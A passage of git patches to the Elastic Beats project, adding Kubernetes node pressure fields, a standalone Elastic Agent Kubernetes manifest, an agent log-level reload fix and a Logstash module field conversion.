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" } diff --git a/metricbeat/module/kubernetes/state_node/_meta/fields.yml b/metricbeat/module/kubernetes/state_node/_meta/fields.yml index ea0f952089ee..b7d5f2a19209 100644 --- a/metricbeat/module/kubernetes/state_node/_meta/fields.yml +++ b/metricbeat/module/kubernetes/state_node/_meta/fields.yml @@ -15,6 +15,22 @@ type: boolean description: > Node unschedulable status + - name: memory_pressure + type: boolean + description: > + Node MemoryPressure status + - name: disk_pressure + type: boolean + description: > + Node DiskPressure status + - name: out_of_disk + type: boolean + description: > + Node OutOfDisk status + - name: pid_pressure + type: boolean + description: > + Node PIDPressure status - name: cpu type: group fields: diff --git a/metricbeat/module/kubernetes/state_node/_meta/test/ksm.v1.3.0.expected b/metricbeat/module/kubernetes/state_node/_meta/test/ksm.v1.3.0.expected index c560b169d770..38a0cc0dae10 100644 --- a/metricbeat/module/kubernetes/state_node/_meta/test/ksm.v1.3.0.expected +++ b/metricbeat/module/kubernetes/state_node/_meta/test/ksm.v1.3.0.expected @@ -29,6 +29,9 @@ } }, "status": { + "disk_pressure": "false", + "memory_pressure": "false", + "out_of_disk": "false", "ready": "true", "unschedulable": false } diff --git a/metricbeat/module/kubernetes/state_node/_meta/test/ksm.v1.8.0.expected b/metricbeat/module/kubernetes/state_node/_meta/test/ksm.v1.8.0.expected index 7b0390a04a26..371c9ca294bd 100644 --- a/metricbeat/module/kubernetes/state_node/_meta/test/ksm.v1.8.0.expected +++ b/metricbeat/module/kubernetes/state_node/_meta/test/ksm.v1.8.0.expected @@ -29,6 +29,9 @@ } }, "status": { + "disk_pressure": "false", + "memory_pressure": "false", + "pid_pressure": "false", "ready": "true", "unschedulable": false } diff --git a/metricbeat/module/kubernetes/state_node/state_node.go b/metricbeat/module/kubernetes/state_node/state_node.go index bd3349152402..f2a1a6b965e6 100644 --- a/metricbeat/module/kubernetes/state_node/state_node.go +++ b/metricbeat/module/kubernetes/state_node/state_node.go @@ -49,12 +49,16 @@ var ( "kube_node_status_allocatable_cpu_cores": p.Metric("cpu.allocatable.cores"), "kube_node_spec_unschedulable": p.BooleanMetric("status.unschedulable"), "kube_node_status_ready": p.LabelMetric("status.ready", "condition"), - "kube_node_status_condition": p.LabelMetric("status.ready", "status", - p.OpFilter(map[string]string{ - "condition": "Ready", - })), + "kube_node_status_condition": p.LabelMetric("status", "status", p.OpFilterMap( + "condition", map[string]string{ + "Ready": "ready", + "MemoryPressure": "memory_pressure", + "DiskPressure": "disk_pressure", + "OutOfDisk": "out_of_disk", + "PIDPressure": "pid_pressure", + }, + )), }, - Labels: map[string]p.LabelMap{ "node": p.KeyLabel("name"), }, From 5538a21b68f3792ff365aaa100d0420d92e03d05 Mon Sep 17 00:00:00 2001 From: Chris Mark Date: Tue, 16 Feb 2021 14:53:45 +0200 Subject: [PATCH 51/63] Add Agent standalone k8s manifest (#23679) --- .../elastic-agent-standalone-kubernetes.yml | 509 ++++++++++++++++++ 1 file changed, 509 insertions(+) create mode 100644 deploy/kubernetes/elastic-agent-standalone-kubernetes.yml diff --git a/deploy/kubernetes/elastic-agent-standalone-kubernetes.yml b/deploy/kubernetes/elastic-agent-standalone-kubernetes.yml new file mode 100644 index 000000000000..f99281b68890 --- /dev/null +++ b/deploy/kubernetes/elastic-agent-standalone-kubernetes.yml @@ -0,0 +1,509 @@ +--- +apiVersion: apps/v1 +kind: DaemonSet +metadata: + name: elastic-agent + namespace: kube-system + labels: + app: elastic-agent +spec: + selector: + matchLabels: + app: elastic-agent + template: + metadata: + labels: + app: elastic-agent + spec: + tolerations: + - key: node-role.kubernetes.io/master + effect: NoSchedule + serviceAccountName: elastic-agent + hostNetwork: true + dnsPolicy: ClusterFirstWithHostNet + containers: + - name: elastic-agent + image: docker.elastic.co/beats/elastic-agent:7.12.0-SNAPSHOT + args: [ + "-c", "/etc/agent.yml", + "-e", "-d", "composable.providers.kubernetes", + ] + env: + - name: ES_USERNAME + value: "elastic" + - name: ES_PASSWORD + value: "" + - name: ES_HOST + value: "" + - name: NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + securityContext: + runAsUser: 0 + resources: + limits: + memory: 200Mi + requests: + cpu: 100m + memory: 100Mi + volumeMounts: + - name: datastreams + mountPath: /etc/agent.yml + readOnly: true + subPath: agent.yml + volumes: + - name: datastreams + configMap: + defaultMode: 0640 + name: agent-node-datastreams +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: agent-node-datastreams + namespace: kube-system + labels: + k8s-app: elastic-agent +data: + agent.yml: |- + id: ef9cc740-5bf0-11eb-8b51-39775155c3f5 + revision: 2 + outputs: + default: + type: elasticsearch + hosts: + - >- + ${ES_HOST} + username: ${ES_USERNAME} + password: ${ES_PASSWORD} + agent: + monitoring: + enabled: true + use_output: default + logs: true + metrics: true + providers.kubernetes: + node: ${NODE_NAME} + scope: node + inputs: + - id: 934ef8aa-ed19-405b-8160-ebf62e3d32f8 + name: kubernetes-node-metrics + revision: 1 + type: kubernetes/metrics + use_output: default + meta: + package: + name: kubernetes + version: 0.2.8 + data_stream: + namespace: default + streams: + - id: >- + kubernetes/metrics-kubernetes.controllermanager-3d50c483-2327-40e7-b3e5-d877d4763fe1 + data_stream: + dataset: kubernetes.controllermanager + type: metrics + metricsets: + - controllermanager + hosts: + - '${kubernetes.pod.ip}:10252' + period: 10s + condition: ${kubernetes.pod.labels.component} == 'kube-controller-manager' + - id: >- + kubernetes/metrics-kubernetes.scheduler-3d50c483-2327-40e7-b3e5-d877d4763fe1 + data_stream: + dataset: kubernetes.scheduler + type: metrics + metricsets: + - scheduler + hosts: + - '${kubernetes.pod.ip}:10251' + period: 10s + condition: ${kubernetes.pod.labels.component} == 'kube-scheduler' + - id: >- + kubernetes/metrics-kubernetes.proxy-3d50c483-2327-40e7-b3e5-d877d4763fe1 + data_stream: + dataset: kubernetes.proxy + type: metrics + metricsets: + - proxy + hosts: + - 'localhost:10249' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.container-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.container + type: metrics + metricsets: + - container + add_metadata: true + bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token + hosts: + - 'https://${env.NODE_NAME}:10250' + period: 10s + ssl.verification_mode: none + - id: >- + kubernetes/metrics-kubernetes.node-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.node + type: metrics + metricsets: + - node + add_metadata: true + bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token + hosts: + - 'https://${env.NODE_NAME}:10250' + period: 10s + ssl.verification_mode: none + - id: kubernetes/metrics-kubernetes.pod-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.pod + type: metrics + metricsets: + - pod + add_metadata: true + bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token + hosts: + - 'https://${env.NODE_NAME}:10250' + period: 10s + ssl.verification_mode: none + - id: >- + kubernetes/metrics-kubernetes.system-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.system + type: metrics + metricsets: + - system + add_metadata: true + bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token + hosts: + - 'https://${env.NODE_NAME}:10250' + period: 10s + ssl.verification_mode: none + - id: >- + kubernetes/metrics-kubernetes.volume-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.volume + type: metrics + metricsets: + - volume + add_metadata: true + bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token + hosts: + - 'https://${env.NODE_NAME}:10250' + period: 10s + ssl.verification_mode: none +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: elastic-agent + namespace: kube-system + labels: + app: elastic-agent +spec: + selector: + matchLabels: + app: elastic-agent + template: + metadata: + labels: + app: elastic-agent + spec: + serviceAccountName: elastic-agent + containers: + - name: elastic-agent + image: docker.elastic.co/beats/elastic-agent:7.12.0-SNAPSHOT + args: [ + "-c", "/etc/agent.yml", + "-e", "-d", "composable.providers.kubernetes", + ] + env: + - name: ES_USERNAME + value: "elastic" + - name: ES_PASSWORD + value: "" + - name: ES_HOST + value: "" + - name: NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + # this is needed because we cannot use hostNetwork + - name: HOSTNAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + securityContext: + runAsUser: 0 + resources: + limits: + memory: 200Mi + requests: + cpu: 100m + memory: 100Mi + volumeMounts: + - name: datastreams + mountPath: /etc/agent.yml + readOnly: true + subPath: agent.yml + volumes: + - name: datastreams + configMap: + defaultMode: 0640 + name: agent-deployment-datastreams +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: agent-deployment-datastreams + namespace: kube-system + labels: + k8s-app: elastic-agent +data: + # This part requires `kube-state-metrics` up and running under `kube-system` namespace + agent.yml: |- + id: ef9cc740-5bf0-11eb-8b51-39775155c3f5 + revision: 2 + outputs: + default: + type: elasticsearch + hosts: + - >- + ${ES_HOST} + username: ${ES_USERNAME} + password: ${ES_PASSWORD} + agent: + monitoring: + enabled: true + use_output: default + logs: true + metrics: true + inputs: + - id: 934ef8aa-ed19-405b-8160-ebf62e3d32f9 + name: kubernetes-cluster-metrics + revision: 1 + type: kubernetes/metrics + use_output: default + meta: + package: + name: kubernetes + version: 0.2.8 + data_stream: + namespace: default + streams: + - id: >- + kubernetes/metrics-kubernetes.apiserver-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.apiserver + type: metrics + metricsets: + - apiserver + bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token + hosts: + - 'https://${env.KUBERNETES_SERVICE_HOST}:${env.KUBERNETES_SERVICE_PORT}' + period: 30s + ssl.certificate_authorities: + - /var/run/secrets/kubernetes.io/serviceaccount/ca.crt + - id: >- + kubernetes/metrics-kubernetes.event-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.event + type: metrics + metricsets: + - event + period: 10s + add_metadata: true + - id: >- + kubernetes/metrics-kubernetes.state_container-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_container + type: metrics + metricsets: + - state_container + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_cronjob-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_cronjob + type: metrics + metricsets: + - state_cronjob + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_deployment-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_deployment + type: metrics + metricsets: + - state_deployment + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_node-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_node + type: metrics + metricsets: + - state_node + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_persistentvolume-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_persistentvolume + type: metrics + metricsets: + - state_persistentvolume + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_persistentvolumeclaim-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_persistentvolumeclaim + type: metrics + metricsets: + - state_persistentvolumeclaim + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_pod-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_pod + type: metrics + metricsets: + - state_pod + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_replicaset-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_replicaset + type: metrics + metricsets: + - state_replicaset + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_resourcequota-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_resourcequota + type: metrics + metricsets: + - state_resourcequota + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_service-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_service + type: metrics + metricsets: + - state_service + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_statefulset-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_statefulset + type: metrics + metricsets: + - state_statefulset + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s + - id: >- + kubernetes/metrics-kubernetes.state_storageclass-934ef8aa-ed19-405b-8160-ebf62e3d32f8 + data_stream: + dataset: kubernetes.state_storageclass + type: metrics + metricsets: + - state_storageclass + add_metadata: true + hosts: + - 'kube-state-metrics:8080' + period: 10s +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: elastic-agent +subjects: + - kind: ServiceAccount + name: elastic-agent + namespace: kube-system +roleRef: + kind: ClusterRole + name: elastic-agent + apiGroup: rbac.authorization.k8s.io +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: elastic-agent + labels: + k8s-app: elastic-agent +rules: + - apiGroups: [""] + resources: + - nodes + - namespaces + - events + - pods + - secrets + verbs: ["get", "list", "watch"] + - apiGroups: ["extensions"] + resources: + - replicasets + verbs: ["get", "list", "watch"] + - apiGroups: ["apps"] + resources: + - statefulsets + - deployments + - replicasets + verbs: ["get", "list", "watch"] + - apiGroups: + - "" + resources: + - nodes/stats + verbs: + - get + # required for apiserver + - nonResourceURLs: + - "/metrics" + verbs: + - get +--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: elastic-agent + namespace: kube-system + labels: + k8s-app: elastic-agent +--- From 55b1e2aa18c6a23a78b024cfd16652ca8f45e30b Mon Sep 17 00:00:00 2001 From: Michal Pristas Date: Tue, 16 Feb 2021 15:32:51 +0100 Subject: [PATCH 52/63] [Ingest Management] Fix reloading of log level for services (#24055) [Ingest Management] Fix reloading of log level for services (#24055) --- x-pack/elastic-agent/CHANGELOG.asciidoc | 1 + .../testdata/endpoint_basic-endpoint-security.yml | 1 + .../pkg/agent/program/testdata/endpoint_basic.yml | 1 + x-pack/elastic-agent/pkg/config/config.go | 6 ++++++ x-pack/elastic-agent/pkg/core/server/server.go | 11 +++++++++++ 5 files changed, 20 insertions(+) diff --git a/x-pack/elastic-agent/CHANGELOG.asciidoc b/x-pack/elastic-agent/CHANGELOG.asciidoc index 58f827aca178..b0b5066d27d2 100644 --- a/x-pack/elastic-agent/CHANGELOG.asciidoc +++ b/x-pack/elastic-agent/CHANGELOG.asciidoc @@ -34,6 +34,7 @@ - Fixed Monitoring filebeat and metricbeat not connecting to Agent over GRPC {pull}23843[23843] - Fixed make status readable in the log. {pull}23849[23849] - Windows agent doesn't uninstall with a lowercase `c:` drive in the path {pull}23998[23998] +- Fix reloading of log level for services {pull}[24055]24055 ==== New features diff --git a/x-pack/elastic-agent/pkg/agent/program/testdata/endpoint_basic-endpoint-security.yml b/x-pack/elastic-agent/pkg/agent/program/testdata/endpoint_basic-endpoint-security.yml index b77a83633aef..d81d276f3685 100644 --- a/x-pack/elastic-agent/pkg/agent/program/testdata/endpoint_basic-endpoint-security.yml +++ b/x-pack/elastic-agent/pkg/agent/program/testdata/endpoint_basic-endpoint-security.yml @@ -2,6 +2,7 @@ revision: 5 fleet: agent: id: fleet-agent-id + logging.level: error host: id: host-agent-id api: diff --git a/x-pack/elastic-agent/pkg/agent/program/testdata/endpoint_basic.yml b/x-pack/elastic-agent/pkg/agent/program/testdata/endpoint_basic.yml index 728b4813a4eb..1681926c56e8 100644 --- a/x-pack/elastic-agent/pkg/agent/program/testdata/endpoint_basic.yml +++ b/x-pack/elastic-agent/pkg/agent/program/testdata/endpoint_basic.yml @@ -3,6 +3,7 @@ name: Endpoint Host fleet: agent: id: fleet-agent-id + logging.level: error host: id: host-agent-id access_api_key: VuaCfGcBCdbkQm-e5aOx:ui2lp2axTNmsyakw9tvNnw diff --git a/x-pack/elastic-agent/pkg/config/config.go b/x-pack/elastic-agent/pkg/config/config.go index 593631f0050e..2de84972a6b6 100644 --- a/x-pack/elastic-agent/pkg/config/config.go +++ b/x-pack/elastic-agent/pkg/config/config.go @@ -116,6 +116,12 @@ func NewConfigFrom(from interface{}, opts ...interface{}) (*Config, error) { } if len(skippedKeys) > 0 { err = cfg.Merge(skippedKeys, ucfg.ResolveNOOP) + + // we modified incoming object + // cleanup so skipped keys are not missing + for k, v := range skippedKeys { + data[k] = v + } } return newConfigFrom(cfg), err } diff --git a/x-pack/elastic-agent/pkg/core/server/server.go b/x-pack/elastic-agent/pkg/core/server/server.go index f0b8ac73d8a5..97517eb6ce6b 100644 --- a/x-pack/elastic-agent/pkg/core/server/server.go +++ b/x-pack/elastic-agent/pkg/core/server/server.go @@ -249,9 +249,13 @@ func (s *Server) Checkin(server proto.ElasticAgent_CheckinServer) error { }() var ok bool + var observedConfigStateIdx uint64 var firstCheckin *proto.StateObserved select { case firstCheckin, ok = <-firstCheckinChan: + if firstCheckin != nil { + observedConfigStateIdx = firstCheckin.ConfigStateIdx + } break case <-time.After(InitialCheckinTimeout): // close connection @@ -281,6 +285,13 @@ func (s *Server) Checkin(server proto.ElasticAgent_CheckinServer) error { s.logger.Debug("check-in stream cannot connect, application is being destroyed; closing connection") return status.Error(codes.Unavailable, "application cannot connect being destroyed") } + + // application is running as a service and counter is already counting + // force config reload + if observedConfigStateIdx > 0 { + appState.expectedConfigIdx = observedConfigStateIdx + 1 + } + checkinDone := make(chan bool) appState.checkinDone = checkinDone appState.checkinLock.Unlock() From 0d4109da65b2db5301055de9fca3e7cc4a4e78f8 Mon Sep 17 00:00:00 2001 From: Andrew Kroh Date: Tue, 16 Feb 2021 09:37:28 -0500 Subject: [PATCH 53/63] [Filebeat] Convert logstash logEvent.action objects to strings (#23944) To prevent index failures resulting from indexing a mix of strings and nested objects as logstash.log.log_event.action, this converts any objects to a stringified version of the object using painless toString(). Fixes #20709 --- CHANGELOG.next.asciidoc | 1 + filebeat/docs/fields.asciidoc | 7 +++++++ filebeat/module/logstash/fields.go | 2 +- filebeat/module/logstash/log/_meta/fields.yml | 2 ++ .../logstash/log/ingest/pipeline-json.yml | 10 +++++++++ .../logstash/log/test/logstash-json.log | 1 + .../log/test/logstash-json.log-expected.json | 21 +++++++++++++++++++ 7 files changed, 43 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 5f353ec1b2cf..b570ea92379b 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -380,6 +380,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Use rfc6587 framing for fortinet firewall and clientendpoint filesets when transferring over tcp. {pull}23837[23837] - Fix httpjson input logging so it doesn't conflict with ECS. {pull}23972[23972] - Fix Okta default date formatting. {issue}24018[24018] {pull}24025[24025] +- Fix Logstash module handling of logstash.log.log_event.action field. {issue}20709[20709] *Heartbeat* diff --git a/filebeat/docs/fields.asciidoc b/filebeat/docs/fields.asciidoc index a8cb2e8d44ad..e47e37fc1948 100644 --- a/filebeat/docs/fields.asciidoc +++ b/filebeat/docs/fields.asciidoc @@ -86605,6 +86605,13 @@ type: object -- +*`logstash.log.log_event.action`*:: ++ +-- +type: keyword + +-- + *`logstash.log.pipeline_id`*:: + -- diff --git a/filebeat/module/logstash/fields.go b/filebeat/module/logstash/fields.go index 2097117ebf70..c65c5f1955de 100644 --- a/filebeat/module/logstash/fields.go +++ b/filebeat/module/logstash/fields.go @@ -32,5 +32,5 @@ func init() { // AssetLogstash returns asset data. // This is the base64 encoded gzipped contents of module/logstash. func AssetLogstash() string { - return "eJzsVU1v2zAMvedXED23+QE+9LKtQIB9ANvuhmLTMhdJFPSRxP9+sB0ntiN3SNsVGDDdLFp875FP1APssMlAsfRB+HoFECgozOBu2LpbAZToC0c2EJsMHlcAcD4BX7iMClcAFaEqfdZFH8AIjZO87QqNxQyk42hPO4nM00yzbOe9C9HPI6Ln2BXQIli/njpIqBxrCDXCkLRTsB79Ouc25qeHUoxXT2WHzYFdOYs9Q6hdP2s85QR2UCjhPRxqdNhRxD2aAOxIkhEB10lKoXYo5rCvoLQxFTst2jCILcfQUXHRGDLyhDbiqFguMQTQUQXKUwWdKMBjuAoOGq6CI6vkXYGS0nn7C4t56A/Kd9iAMCXshYoIJW6jlK1mulQk3QJLFhUZzOmWPuBRaNv6Wwsyt9tm8xG46lowwF/Ipb2L3guZNq9QJPwsYkWol05pkk707IKLmG4Q7lHdiKZYrlPnlvAGLK/4MJsdt86H6xT/B8E/MQiWh8CLZH8XByijtsPtOmlSSZy/qcuqKMnk7cfbqfsqNJ7nRgfwHHYL9IYeb+wMO4ONsTH4e3giFdD5e/gWQ7vT3oIPXGLhF8zOvMvJ5JqUovks6TkqNvI2gp+OWMTO74E0QsVuxBXIQI+GBZtygdepcFY4odO0XlS6H8G1l65/mSYlhIJNRTL24/H97dkrzZPv7eue4ofHqd6JUIgeS9g2o0qkG/IerxAkjGmE4bQBlnG7CbMuF3o5A/8dAAD//7rhE3k=" + return "eJzsVk1v2zAMvedXED23+QE+9LKtQIF9ANvuhmLTMhdJFPSRxP9+sB0ntiN3TdsVGDDdIlp871FPZO5gi00GiqUPwtcrgEBBYQY3w9bNCqBEXziygdhkcL8CgNMJ+MJlVLgCqAhV6bMuegdGaJzkbVdoLGYgHUd73ElknmaaZTvtnYl+HhE9xS6AFsH69dBBQuVYQ6gRhqSdgvXo0zm3MT89lGK8eipbbPbsylnsCULt+lnjMSewg0IJ72Ffo8OOIu7QBGBHkowIuE5SCrVDMYd9BaVHU7HTog2D2HAMHRUXjSEjj2gjjorlEkMAHVWgPFXQiQI8hIvgoOEiOLJK3hUoKZ03v7CYh/6gfIsNCFPCTqiIUOImStlqpnNF0ldworIWRfvVsy9jSGDJoiKDOV1zkXgQ2rYPRAuaYz7Dd48fgavuDgf4s7q0+dF7IdPuF4qEn0WsCPXSKU3SiZ5dcBHTZcUdqivRFMt16twS3oDlFe9nzefaBnOZ4n8n+Sc6yXIXeZHs72IPZdR2eF1HTSqJ8zd1WRUlmbz98XbqvgqNp77RATyF3QK9occbO8PO4NHYGPwtPJAK6PwtfIuh3WlfwQcusfALZmfe5mRyTUrRvJf0HBUbeR3BTwcsYuf3QBqhYjfiCmSgR8OCTbnA61g4K5zQaVovKt2P4NpH14+2SQmhYFORjH17fH979krz5MB+3Sy/u5/qnQiF6LGETTOqxMJwf4cpBAljGmE4bYBl3P5PSLlwlzPw3wEAAP//W7kkpQ==" } diff --git a/filebeat/module/logstash/log/_meta/fields.yml b/filebeat/module/logstash/log/_meta/fields.yml index 6ca12ca11bfb..36fa8bfb0cbc 100644 --- a/filebeat/module/logstash/log/_meta/fields.yml +++ b/filebeat/module/logstash/log/_meta/fields.yml @@ -19,6 +19,8 @@ type: object description: > key and value debugging information. + - name: log_event.action + type: keyword - name: pipeline_id type: keyword example: main diff --git a/filebeat/module/logstash/log/ingest/pipeline-json.yml b/filebeat/module/logstash/log/ingest/pipeline-json.yml index f14a3be28555..807079ed84e3 100644 --- a/filebeat/module/logstash/log/ingest/pipeline-json.yml +++ b/filebeat/module/logstash/log/ingest/pipeline-json.yml @@ -31,6 +31,16 @@ processors: - rename: field: logstash.log.level target_field: log.level +- script: + description: Convert logstash.log.log_event.action elements to string. + 